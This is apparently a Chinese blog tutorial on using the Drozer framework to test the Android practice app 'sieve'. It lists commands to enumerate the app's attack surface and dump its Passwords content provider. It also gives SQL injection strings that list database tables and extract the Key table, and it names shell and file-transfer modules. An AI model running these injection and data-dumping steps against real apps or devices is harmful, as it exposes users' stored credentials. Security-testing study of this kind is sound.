一、安装与启动

1. 安装

第一步:从 http://mwr.to/drozer 下载Drozer (Windows Installer)

第二步:在 Android 设备中安装 agent.apk

adb install agent.apk

2. 启动

第一步:在 PC 上使用 adb 进行端口转发,转发到 Drozer使用的端口 31415

adb forward tcp:31415 tcp:31415

第二步:在 Android 设备上开启 Drozer Agent

选择 embedded server-enable

第三步:在 PC 上开启 Drozer console

drozer console connect

二、测试步骤

1.获取包名

dz> run app.package.list -f sieve

com.mwr.example.sieve

2.获取应用的基本信息

run app.package.info -a com.mwr.example.sieve

3.确定攻击面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

( 1 )获取 activity 信息

run app.activity.info -a com.mwr.example.sieve

( 2 )启动 activity

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]

[--component PACKAGE COMPONENT] [--data-uri DATA_URI]

[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]

[--mimetype MIMETYPE]

5.Content Provider

( 1 )获取 Content Provider 信息

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers (数据泄露)

先获取所有可以访问的 Uri :

run scanner.provider.finduris -a com.mwr.example.sieve

获取各个 Uri 的数据:

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

查询到数据说明存在漏洞

(3)Content Providers ( SQL 注入)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在 SQL 注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

获取某个表(如 Key )中的数据:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

( 4 )同时检测 SQL 注入和目录遍历

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

6.Service

(1)获取 service 详情

run app.service.info -a com.mwr.example.sieve

7. 其它模块

shell.start 在设备上开启一个交互shell

tools.file.upload / tools.file.download 上传/下载文件到设备

tools.setup.busybox / tools.setup.minimalsu 安装可用的二进制文件

最新文章

  1. C#委托异步调用
  2. Centos安装jdk
  3. 物理主机win 7系统迁移至VMware ESXI服务器
  4. WIFI WPA1/2 Crack for Windows
  5. js日期时间比较函数
  6. HDU1561 The more, The Better(树形DP)
  7. vmware设置centos虚拟机nat联网(转载)
  8. 转:基于TLS1.3的微信安全通信协议mmtls介绍
  9. Java was started but returned exit code=13 C:\ProgramData\Oracle\Java\javapath\javaw.exe
  10. Python之实现一个简易计算器
  11. 用 Qt 中的 QDomDocument类 处理 XML 文件(下)
  12. WeakHashMap
  13. 【LOJ6074】【2017 山东一轮集训 Day6】子序列 DP
  14. zabbix 本地编译安装
  15. 2018(2017)美图java服务端笔试(回忆录)
  16. solr集群构建的基本流程介绍
  17. Python3 tkinter基础 Menu add_cascade 多级菜单 add_separator 分割线
  18. [原]Jenkins(十四)---jenkins示例:admin管理所有项目,新建用户只能看部分项目
  19. Java综合高级篇
  20. PHP 的命令行模式

热门文章

  1. String、StringBuffer、StringBuilder的不同使用场景
  2. Android学习笔记(七)——常见控件
  3. 从输入 URL 到浏览器接收的过程中发生了什么事情?
  4. Android九点图(Nine-Patch)制作及应用
  5. 4.了解AngularJS模块和依赖注入
  6. Valgrind 3.11.0编译安装
  7. nginx 下 bootstrap fa 字体异常问题
  8. 将 JAR 转为 EXE – JSMOOTH 的使用教程(第二期)(转载)
  9. Python核心编程这本书的一些错误
  10. C# 类成员备忘